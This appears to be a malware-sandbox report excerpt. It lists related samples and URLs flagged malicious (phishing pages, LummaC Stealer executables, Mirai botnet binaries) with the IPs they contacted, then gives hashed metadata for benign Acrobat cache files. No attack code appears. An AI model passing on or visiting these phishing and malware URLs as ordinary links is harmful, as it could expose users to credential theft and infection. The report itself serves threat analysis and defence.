                                                          Flumroc.docxGet hashmaliciousUnknownBrowse
                                                          • 104.17.25.14
                                                          Flumroc.docxGet hashmaliciousUnknownBrowse
                                                          • 104.18.94.41
                                                          http://calcuttaclub.in/images/uanjodgs/florida-access/Get hashmaliciousUnknownBrowse
                                                          • 1.1.1.1
                                                          https://05kqatnrj9s0snah9.phish.farm/XckdRam1iZXdLcHBTUFlJTlR4SkE5bGxnQ0I0VmtpVFhRWTltRlk3ejQvN2h4WHR0SlJUOXVLRkF5QkQ1R1dlRVVMYWg3RlJPUWwwUFRyeXJqWkhrNHZqU0ErUy9KTC9GRU5UNU9LOFBMaCtIOUgrWG85c2NJdXRVVGY4eG5FVEYrOGgyRGlBQnE2dlQxK1ptMGkvRkUwbkJSMGpnZkMxU2tvSlp3YURJOVFqWkZrV0VLaGJQbldEdS0tV21LS01kOGpOSC9ZWlk0Ry0tZ2ZTcE9EMnkvSHVVSkUvTEhEOWFKQT09?cid=2293724267Get hashmaliciousKnowBe4Browse
                                                          • 104.17.249.203
                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 172.67.165.166
                                                          https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgGet hashmaliciousHTMLPhisherBrowse
                                                          • 104.18.11.207
                                                          https://merchbkofin.com/Get hashmaliciousUnknownBrowse
                                                          • 104.17.249.203
                                                          Full_Setup_v24.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 172.67.150.143
                                                          https://www.yamajifactory.com/products/-blocks?adr_sou=Facebook&adr_con=scsjchymyyxgs136x&adr_ter=1747260705659006&adr_camId=120212709087730561&adr_adsetId=120212709088740561&adr_adId=120212709088200561&adr_camName=%E5%8F%98%E8%84%B8%E7%A7%AF%E6%9C%A8-%E7%A9%BA-241105-10%E7%BE%8E%E9%87%91+-+%E5%B9%BF%E5%91%8A%E5%89%AF%E6%9C%AC&adr_adsetName=%E7%A9%BA&adr_adName=1&fbclid=IwY2xjawG5dOBleHRuA2FlbQEwAGFkaWQBqxTSdVwj4QEdhDiYdyfw0MIu-_Lo4d4m7akVHEnikvJvX5tkNnnCz6_J__eLEz3mVKk8_aem_PKTifAkeMTNORNhDxlyTuAGet hashmaliciousUnknownBrowse
                                                          • 104.19.144.58
                                                          AMAZON-02USub8ehJSePAfc9FYqZIT6.x86_64.elfGet hashmaliciousUnknownBrowse
                                                          • 54.171.230.55
                                                          http://calcuttaclub.in/images/uanjodgs/florida-access/Get hashmaliciousUnknownBrowse
                                                          • 108.158.75.56
                                                          https://05kqatnrj9s0snah9.phish.farm/XckdRam1iZXdLcHBTUFlJTlR4SkE5bGxnQ0I0VmtpVFhRWTltRlk3ejQvN2h4WHR0SlJUOXVLRkF5QkQ1R1dlRVVMYWg3RlJPUWwwUFRyeXJqWkhrNHZqU0ErUy9KTC9GRU5UNU9LOFBMaCtIOUgrWG85c2NJdXRVVGY4eG5FVEYrOGgyRGlBQnE2dlQxK1ptMGkvRkUwbkJSMGpnZkMxU2tvSlp3YURJOVFqWkZrV0VLaGJQbldEdS0tV21LS01kOGpOSC9ZWlk0Ry0tZ2ZTcE9EMnkvSHVVSkUvTEhEOWFKQT09?cid=2293724267Get hashmaliciousKnowBe4Browse
                                                          • 13.227.8.37
                                                          https://poga.blob.core.windows.net/$web/verify-your-account.html?sp=r&st=2024-12-02T06:26:51Z&se=2024-12-31T14:26:51Z&spr=https&sv=2022-11-02&sr=b&sig=AbN1l3IGSW5p4S%2Bg5uP%2BGMaA3Ltc8WWpTnk3GqW0l8c%3D#fdwncadmin@fd.orgGet hashmaliciousHTMLPhisherBrowse
                                                          • 13.227.8.65
                                                          https://public-usa.mkt.dynamics.com/api/orgs/010a432a-e2a3-ef11-8a66-6045bd016f25/r/movKLLTpWUCqpRQQ2_8SfQEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fapp.seesaw.me%252Fpages%252Fshared_item%253Fitem_id%253Ditem.96abdfb3-93cb-482c-822f-f1d275a42e6e%2526share_token%253DDfLCj_YZQZedsrWVvLwerg%2526mode%253Dshare%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%221%22%3Anull%7D%7D&digest=kBeCY6h3I2oKWHussXexCqSpSk%2BEhyyLm0j2TqAuyLY%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15eeGet hashmaliciousUnknownBrowse
                                                          • 13.227.8.13
                                                          https://dashboard-access-micro.softr.app/Get hashmaliciousUnknownBrowse
                                                          • 3.64.247.100
                                                          https://alessiabelltravel.com/Get hashmaliciousUnknownBrowse
                                                          • 3.160.196.88
                                                          http://businessproservice.info/authGet hashmaliciousUnknownBrowse
                                                          • 34.240.123.106
                                                          https://wakelet.com/wake/VbMFlGJpfAHdaeAVj5Ic0Get hashmaliciousUnknownBrowse
                                                          • 3.164.85.72
                                                          OVH-AMP.elfGet hashmaliciousUnknownBrowse
                                                          • 54.171.230.55
                                                          AARNET-AS-APAustralianAcademicandResearchNetworkAARNeteste.arm7.elfGet hashmaliciousMirai, Moobot, OkiruBrowse
                                                          • 138.44.226.180
                                                          botnet.m68k.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 134.115.11.187
                                                          sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                          • 103.163.150.205
                                                          la.bot.sparc.elfGet hashmaliciousMiraiBrowse
                                                          • 103.172.4.110
                                                          la.bot.mips.elfGet hashmaliciousMiraiBrowse
                                                          • 134.149.200.53
                                                          botnet.sh4.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 103.166.231.231
                                                          botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 103.163.150.225
                                                          mpsl.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 103.182.254.136
                                                          x86-20241130-2047.elfGet hashmaliciousMiraiBrowse
                                                          • 157.85.210.241
                                                          spc.elfGet hashmaliciousMirai, MoobotBrowse
                                                          • 103.189.218.24
                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                          28a2c9bd18a11de089ef85a160da29e4ATT4802.htmlGet hashmaliciousUnknownBrowse
                                                          • 4.175.87.197
                                                          • 13.107.246.63
                                                          • 23.32.185.164
                                                          Flumroc.docxGet hashmaliciousUnknownBrowse
                                                          • 4.175.87.197
                                                          • 13.107.246.63
                                                          • 23.32.185.164
                                                          https://05kqatnrj9s0snah9.phish.farm/XckdRam1iZXdLcHBTUFlJTlR4SkE5bGxnQ0I0VmtpVFhRWTltRlk3ejQvN2h4WHR0SlJUOXVLRkF5QkQ1R1dlRVVMYWg3RlJPUWwwUFRyeXJqWkhrNHZqU0ErUy9KTC9GRU5UNU9LOFBMaCtIOUgrWG85c2NJdXRVVGY4eG5FVEYrOGgyRGlBQnE2dlQxK1ptMGkvRkUwbkJSMGpnZkMxU2tvSlp3YURJOVFqWkZrV0VLaGJQbldEdS0tV21LS01kOGpOSC9ZWlk0Ry0tZ2ZTcE9EMnkvSHVVSkUvTEhEOWFKQT09?cid=2293724267Get hashmaliciousKnowBe4Browse
                                                          • 4.175.87.197
                                                          • 13.107.246.63
                                                          • 23.32.185.164
                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 4.175.87.197
                                                          • 13.107.246.63
                                                          • 23.32.185.164
                                                          https://public-usa.mkt.dynamics.com/api/orgs/010a432a-e2a3-ef11-8a66-6045bd016f25/r/movKLLTpWUCqpRQQ2_8SfQEAAAA?target=%7B%22TargetUrl%22%3A%22https%253A%252F%252Fapp.seesaw.me%252Fpages%252Fshared_item%253Fitem_id%253Ditem.96abdfb3-93cb-482c-822f-f1d275a42e6e%2526share_token%253DDfLCj_YZQZedsrWVvLwerg%2526mode%253Dshare%22%2C%22RedirectOptions%22%3A%7B%225%22%3Anull%2C%221%22%3Anull%7D%7D&digest=kBeCY6h3I2oKWHussXexCqSpSk%2BEhyyLm0j2TqAuyLY%3D&secretVersion=a587597bbd2d4ba3bb4334f6d8be15eeGet hashmaliciousUnknownBrowse
                                                          • 4.175.87.197
                                                          • 13.107.246.63
                                                          • 23.32.185.164
                                                          https://www.yamajifactory.com/products/-blocks?adr_sou=Facebook&adr_con=scsjchymyyxgs136x&adr_ter=1747260705659006&adr_camId=120212709087730561&adr_adsetId=120212709088740561&adr_adId=120212709088200561&adr_camName=%E5%8F%98%E8%84%B8%E7%A7%AF%E6%9C%A8-%E7%A9%BA-241105-10%E7%BE%8E%E9%87%91+-+%E5%B9%BF%E5%91%8A%E5%89%AF%E6%9C%AC&adr_adsetName=%E7%A9%BA&adr_adName=1&fbclid=IwY2xjawG5dOBleHRuA2FlbQEwAGFkaWQBqxTSdVwj4QEdhDiYdyfw0MIu-_Lo4d4m7akVHEnikvJvX5tkNnnCz6_J__eLEz3mVKk8_aem_PKTifAkeMTNORNhDxlyTuAGet hashmaliciousUnknownBrowse
                                                          • 4.175.87.197
                                                          • 13.107.246.63
                                                          • 23.32.185.164
                                                          https://dashboard-access-micro.softr.app/Get hashmaliciousUnknownBrowse
                                                          • 4.175.87.197
                                                          • 13.107.246.63
                                                          • 23.32.185.164
                                                          file.exeGet hashmaliciousLummaC StealerBrowse
                                                          • 4.175.87.197
                                                          • 13.107.246.63
                                                          • 23.32.185.164
                                                          file.exeGet hashmaliciousAmadey, LummaC Stealer, Stealc, VidarBrowse
                                                          • 4.175.87.197
                                                          • 13.107.246.63
                                                          • 23.32.185.164
                                                          Swiftcopy.xla.xlsxGet hashmaliciousUnknownBrowse
                                                          • 4.175.87.197
                                                          • 13.107.246.63
                                                          • 23.32.185.164
                                                          No context
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):292
                                                          Entropy (8bit):5.245865663300475
                                                          Encrypted:false
                                                          SSDEEP:6:ZNyq2Pwkn2nKuAl9OmbnIFUt8QNDYZZmw+QNDYzkwOwkn2nKuAl9OmbjLJ:ZYvYfHAahFUt8Q5E/+Q5k5JfHAaSJ
                                                          MD5:1669147DC3745BA1993D1DD799BBEED5
                                                          SHA1:843C5277DF8DDEC2C15B849B4A1075F05C609006
                                                          SHA-256:479D879DF7DA9CCF35CCD9E8811CD94DB28EC0C8633E48B0D17C87E3B86162FC
                                                          SHA-512:67ACCFE4D96B6F14F5005E7E3596E31592CD7E9657A05FDF7180F7E364694208A0AEF143625A5BD4A5DD887F1BFE2A90C9B2B29CC356E883B8000EA9AC1BC247
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:2024/12/02-11:55:03.875 1c94 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/02-11:55:03.878 1c94 Recovering log #3.2024/12/02-11:55:03.878 1c94 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):292
                                                          Entropy (8bit):5.245865663300475
                                                          Encrypted:false
                                                          SSDEEP:6:ZNyq2Pwkn2nKuAl9OmbnIFUt8QNDYZZmw+QNDYzkwOwkn2nKuAl9OmbjLJ:ZYvYfHAahFUt8Q5E/+Q5k5JfHAaSJ
                                                          MD5:1669147DC3745BA1993D1DD799BBEED5
                                                          SHA1:843C5277DF8DDEC2C15B849B4A1075F05C609006
                                                          SHA-256:479D879DF7DA9CCF35CCD9E8811CD94DB28EC0C8633E48B0D17C87E3B86162FC
                                                          SHA-512:67ACCFE4D96B6F14F5005E7E3596E31592CD7E9657A05FDF7180F7E364694208A0AEF143625A5BD4A5DD887F1BFE2A90C9B2B29CC356E883B8000EA9AC1BC247
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:2024/12/02-11:55:03.875 1c94 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/02-11:55:03.878 1c94 Recovering log #3.2024/12/02-11:55:03.878 1c94 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):336
                                                          Entropy (8bit):5.151527916839667
                                                          Encrypted:false
                                                          SSDEEP:6:ZNnOq2Pwkn2nKuAl9Ombzo2jMGIFUt8QNwZmw+QNPkwOwkn2nKuAl9Ombzo2jMmd:Z4vYfHAa8uFUt8QS/+Qx5JfHAa8RJ
                                                          MD5:B6701639C18547A37518CE835C72166A
                                                          SHA1:EE061E05EE25F29AA292BF062C2FE757E13B439D
                                                          SHA-256:1DC48D9843FD68D1D2E1D6F31BC47F47B72C5DC0F581D00844D036116EDB9012
                                                          SHA-512:8E7F2B49F24BB490878BBF577B32482A0C00FCAD813B2CE83051E576D7B5C934C134E54EE0DFBB84AD648C0F59BA7888143B5DA9A47BC968723F0ADFBD19FD84
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:2024/12/02-11:55:03.992 1d00 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/02-11:55:03.993 1d00 Recovering log #3.2024/12/02-11:55:03.994 1d00 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):336
                                                          Entropy (8bit):5.151527916839667
                                                          Encrypted:false
                                                          SSDEEP:6:ZNnOq2Pwkn2nKuAl9Ombzo2jMGIFUt8QNwZmw+QNPkwOwkn2nKuAl9Ombzo2jMmd:Z4vYfHAa8uFUt8QS/+Qx5JfHAa8RJ
                                                          MD5:B6701639C18547A37518CE835C72166A
                                                          SHA1:EE061E05EE25F29AA292BF062C2FE757E13B439D
                                                          SHA-256:1DC48D9843FD68D1D2E1D6F31BC47F47B72C5DC0F581D00844D036116EDB9012
                                                          SHA-512:8E7F2B49F24BB490878BBF577B32482A0C00FCAD813B2CE83051E576D7B5C934C134E54EE0DFBB84AD648C0F59BA7888143B5DA9A47BC968723F0ADFBD19FD84
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:2024/12/02-11:55:03.992 1d00 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/02-11:55:03.993 1d00 Recovering log #3.2024/12/02-11:55:03.994 1d00 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:JSON data
                                                          Category:modified
                                                          Size (bytes):475
                                                          Entropy (8bit):4.964328371845981
                                                          Encrypted:false
                                                          SSDEEP:12:YH/um3RA8sq2MjJHksBdOg2Hacaq3QYiubInP7E4TX:Y2sRdsFMjJHJdMHV3QYhbG7n7
                                                          MD5:3B89F07AFB5EA42FD9413EDFEAD4712D
                                                          SHA1:29D4C4C50BE4CAEBEB674DDDEACD29DE513DAC0E
                                                          SHA-256:9B2A1604ABF085C18F27E332F571486BF23C6B5B9DA9CDBEB788F76E0A5073A6
                                                          SHA-512:77559D0B509EDEB308187B26D2D89CCF9494C9D3AFB86DC5FCF5763006FB3FB921415D33945E1C102DFCCF861EE2DB5E781208D1E6B140346F1E625C28364627
                                                          Malicious:false
                                                          Reputation:low
                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13377718512922495","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":694944},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):475
                                                          Entropy (8bit):4.967403857886107
                                                          Encrypted:false
                                                          SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                          MD5:B7761633048D74E3C02F61AD04E00147
                                                          SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                          SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                          SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                          Malicious:false
                                                          Reputation:moderate, very likely benign file
                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):475
                                                          Entropy (8bit):4.967403857886107
                                                          Encrypted:false
                                                          SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                          MD5:B7761633048D74E3C02F61AD04E00147
                                                          SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                          SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                          SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                          Malicious:false
                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:JSON data
                                                          Category:dropped
                                                          Size (bytes):475
                                                          Entropy (8bit):4.967403857886107
                                                          Encrypted:false
                                                          SSDEEP:12:YH/um3RA8sqLsBdOg2HHfcaq3QYiubInP7E4TX:Y2sRdsVdMHO3QYhbG7n7
                                                          MD5:B7761633048D74E3C02F61AD04E00147
                                                          SHA1:72A2D446DF757BAEA2C7A58C050925976E4C9372
                                                          SHA-256:1A468796D744FCA806D1F828C07E0064AB6A1FA0E31DA3A403F12B9B89868B67
                                                          SHA-512:397A10C510FAA048E4AAB08A11B2AE14A09EE47EC4F5A2B47CE1A9580C2874ADE0F9F8FC287B9358C0FFEA4C89F8AB9270B9CA00064EA90CD2EF0EAD0A59369F
                                                          Malicious:false
                                                          Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340980889952523","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":146406},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.4","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):4730
                                                          Entropy (8bit):5.255548200729056
                                                          Encrypted:false
                                                          SSDEEP:96:etJCV4FAsszrNamjTN/2rjYMta02fDtehgO7BtTgo7IrtNfLrj7xZ:etJCV4FiN/jTN/2r8Mta02fEhgO73gog
                                                          MD5:41DE9DE65D85B15189AD69901DB8807D
                                                          SHA1:C3523C7AC116D71A225E2D79AFA822263D746E41
                                                          SHA-256:84B6E7D54F5D5486A1CBFCC123EDEFD8D1EB4E1060C4EFE7ED70774E503D546F
                                                          SHA-512:83ABFA6097D0C7FE89AFA6E7B2E409DE96AB5B04DDC80B845B675FAC3BFD72AA28B69A6F2EEA2B9A94303D1AC9D64B26746B298EE3AF0C0C7030C09F2E58A0E1
                                                          Malicious:false
                                                          Preview:*...#................version.1..namespace-['O.o................next-map-id.1.Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/.0>...r................next-map-id.2.Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/.1O..r................next-map-id.3.Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/.2.\.o................next-map-id.4.Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/.3....^...............Pnamespace-158f4913_074a_4bdf_b463_eb784cc805b4-https://rna-resource.acrobat.com/..|.^...............Pnamespace-6070ce43_6a74_4d0a_9cb8_0db6c3126811-https://rna-resource.acrobat.com/n..Fa...............Snamespace-fd2db5bd_ef7e_4124_bfa7_f036ce1d74e5-https://rna-v2-resource.acrobat.com/DQ..a...............Snamespace-cd5be8d1_42d2_481d_ac0e_f904ae470bda-https://rna-v2-resource.acrobat.com/i.`do................next-map-id.5.Pnamespace-de635bf2_6773_4d83_ad16_
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):324
                                                          Entropy (8bit):5.152788107882174
                                                          Encrypted:false
                                                          SSDEEP:6:ZN0q2Pwkn2nKuAl9OmbzNMxIFUt8QNthZmw+QNt7kwOwkn2nKuAl9OmbzNMFLJ:ZavYfHAa8jFUt8Qvh/+Qv75JfHAa84J
                                                          MD5:E6742DC3A9EA2DA219F7B2398BAE7EE2
                                                          SHA1:FC88B24987ED5AA1CABFF697A4139236E5C0B923
                                                          SHA-256:3494C77E8B8D58211086153ACA4EB0DCB7C8EF70DCC20947C2CC1877B7DC276B
                                                          SHA-512:EE47EEA074EFB0B319E69B21092BB2913A923CF924CF5353B4DD8ABC16B7EA797D7D888B3F1F778BC8968369313FD466B345ED664E555D5ABADEA9D0C41813C3
                                                          Malicious:false
                                                          Preview:2024/12/02-11:55:04.197 1d00 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/02-11:55:04.199 1d00 Recovering log #3.2024/12/02-11:55:04.199 1d00 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):324
                                                          Entropy (8bit):5.152788107882174
                                                          Encrypted:false
                                                          SSDEEP:6:ZN0q2Pwkn2nKuAl9OmbzNMxIFUt8QNthZmw+QNt7kwOwkn2nKuAl9OmbzNMFLJ:ZavYfHAa8jFUt8Qvh/+Qv75JfHAa84J
                                                          MD5:E6742DC3A9EA2DA219F7B2398BAE7EE2
                                                          SHA1:FC88B24987ED5AA1CABFF697A4139236E5C0B923
                                                          SHA-256:3494C77E8B8D58211086153ACA4EB0DCB7C8EF70DCC20947C2CC1877B7DC276B
                                                          SHA-512:EE47EEA074EFB0B319E69B21092BB2913A923CF924CF5353B4DD8ABC16B7EA797D7D888B3F1F778BC8968369313FD466B345ED664E555D5ABADEA9D0C41813C3
                                                          Malicious:false
                                                          Preview:2024/12/02-11:55:04.197 1d00 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/02-11:55:04.199 1d00 Recovering log #3.2024/12/02-11:55:04.199 1d00 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:PC bitmap, Windows 3.x format, 107 x -152 x 32, cbSize 65110, bits offset 54
                                                          Category:dropped
                                                          Size (bytes):65110
                                                          Entropy (8bit):0.9692716512729113
                                                          Encrypted:false
                                                          SSDEEP:96:RWVGKgCEy5ZaNIaq10ksUMQkTnp/0VmeOB3aCiGyIu/ega4da/I8F5T:GDvLe2sUMQkTnV0EeOCGyIus/hX
                                                          MD5:44532F78DB1B9040001E105FC3E42313
                                                          SHA1:A9B2E0AC1A96DEABD0097E61A204DD181B631D8D
                                                          SHA-256:DF7E8C2B20C781059C9E9BA871C3D1A2718BFEAE7AB93D36C831457F3E072234
                                                          SHA-512:ABD871BDBE5D4EE3900484EA3073CB966868356FAD7AB498D080FDD653C9CA8064CD2E283CDC285BF49FE2F56B605CB68FC2015C2540B6B1C68DE770367491B0
                                                          Malicious:false
                                                          Preview:BMV.......6...(...k...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                          Category:dropped
                                                          Size (bytes):86016
                                                          Entropy (8bit):4.445011709639067
                                                          Encrypted:false
                                                          SSDEEP:384:yezci5tYiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:r/s3OazzU89UTTgUL
                                                          MD5:211699A81C168CCACB5D6121B28ED6B4
                                                          SHA1:BD852ACBEC24CEF7B473B069093A11C5CAD39002
                                                          SHA-256:F2B180D9A3F6A30EAB3F990783048B698E35BF535814B8C73B2E25DBD003C26E
                                                          SHA-512:8879C1F9479B0459E5EBE380B4918F36F644E84F82079E0395C93571F7AB934DA592925F22B9A309541E9AE15EDB92F5FB50DB733A967DB25BC1D462E9762DAD
                                                          Malicious:false
                                                          Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                          File Type:SQLite Rollback Journal
                                                          Category:dropped
                                                          Size (bytes):8720
                                                          Entropy (8bit):3.7753258534139533
                                                          Encrypted:false
                                                          SSDEEP:48:7MQp/E2ioyVgioy9oWoy1Cwoy1oKOioy1noy1AYoy1Wioy1hioybioy+oy1noy1u:7LpjugFfXKQTOb9IVXEBodRBkJ
                                                          MD5:9206B9488D2750EA83839BA4DA2F7BF8
                                                          SHA1:C04AE7AB36D81B68F4627D67CFEF5CFD092D4523
                                                          SHA-256:E93EA5A8B420D7DF8095F8E7F47BEC7DAD1ACBDC1BFE5ADBD12707788BC9C433
                                                          SHA-512:7AAF94B64D43B1A769E0762087EB38DD9E35FCB4559C0D11630E0408831BAE32C1307BAB359959E3D0A382BD8D47E2079C572C36A47407A921BE392F88DB0A70
                                                          Malicious:false
                                                          Preview:.... .c.......#W...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                          File Type:Certificate, Version=3
                                                          Category:dropped
                                                          Size (bytes):1391
                                                          Entropy (8bit):7.705940075877404
                                                          Encrypted:false
                                                          SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                          MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                          SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                          SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                          SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                          Malicious:false
